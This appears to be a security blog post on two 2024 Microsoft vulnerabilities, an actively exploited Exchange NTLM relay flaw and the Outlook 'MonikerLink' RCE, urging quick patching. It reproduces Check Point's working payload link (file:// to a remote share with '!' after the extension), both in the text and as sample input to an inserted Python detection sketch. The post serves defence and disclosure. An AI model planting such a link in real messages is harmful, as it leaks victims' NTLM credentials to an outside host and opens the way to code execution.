Exchange zero day being actively exploited, Outlook RCE zero day also out there


Both the Exchange vulnerability, CVE-2024-21410 (CVSS 9.8), and the Outlook vulnerability, CVE-2024-21413 (CVSS 9.8), were patched in this week’s release of patches from Microsoft. CVE-2024-21410 was being exploited before the patch was released, so you should absolutely be doing a threat hunt after applying the patch.

CVE-2024-21410 is a remote attack that allows an unauthenticated attacker to escalate privileges using an NTLM relay attack. Per Microsoft: “An attacker could target an NTLM client such as Outlook with an NTLM credentials-leaking type vulnerability. The leaked credentials can then be relayed against the Exchange server to gain privileges as the victim client and to perform operations on the Exchange server on the victim’s behalf.” The mitigation is to apply this week’s patch, but be aware that installing it will automatically enable Extended Protection, which could potentially break scripts that you may have, so make sure you read the notes to understand exactly what is changing.

CVE-2024-21413 is an RCE for Outlook that is startlingly simple to exploit. The vulnerability allows attackers to bypass Protected View with a malicious link, which means the exploit affects the preview pane and not just emails that are actually opened. Researchers from Check Point identified that using the file:// protocol and then putting an exclamation mark after the file extension will trigger Outlook to access the URL without any user interaction required or any notifications made to the user. This is the example Check Point included:

*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
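A detection sketch for the link shape described above, added here as an example and not code from Check Point or Microsoft: it flags file: links in an HTML mail body whose file extension is followed by "!". The function names and the sample body are assumptions; the first sample link is the Check Point example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Extension immediately followed by "!", e.g. "test.rtf!something".
EXT_BANG = re.compile(r"\.[A-Za-z0-9]{1,10}!")

class _LinkCollector(HTMLParser):
    """Collects href/src attribute values from an HTML mail body."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        self.links += [v for k, v in attrs if k in ("href", "src") and v]

def classify_link(url):
    """Return (verdict, first_component) for file: links, else None.

    verdict is "moniker" when an extension is followed by "!", otherwise
    "file". first_component is the UNC host when the link targets a share.
    """
    decoded = unquote(url.strip())          # also catches %21 and %5C forms
    if not decoded.lower().startswith("file:"):
        return None
    target = decoded[5:]
    parts = [p for p in re.split(r"[\\/]+", target) if p]
    verdict = "moniker" if EXT_BANG.search(target) else "file"
    return verdict, (parts[0] if parts else "")

def scan_html(body):
    """Return [(verdict, first_component, original_href), ...] for a body."""
    collector = _LinkCollector()
    collector.feed(body)
    collector.close()
    findings = []
    for link in collector.links:
        result = classify_link(link)
        if result:
            findings.append((result[0], result[1], link))
    return findings

# Constructed sample body; the first link is the Check Point example above.
SAMPLE = (
    r'<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>'
    r'<a href="https://example.com/a.html!x">ok</a>'
    r'<a href="file:///C:/docs/readme.txt">local</a>'
)

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```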

As of this time the Outlook vulnerability does not have any known public exploits, but given how incredibly easy it is to exploit, it will only be a matter of time before it is used by attackers. Based on this, I probably would not wait for a normal patch cycle and would patch both CVEs mentioned in this article as quickly as possible.

Links:

https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-21410

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413

https://microsoft.github.io/CSS-Exchange/Security/ExchangeExtendedProtectionManagement/

https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/


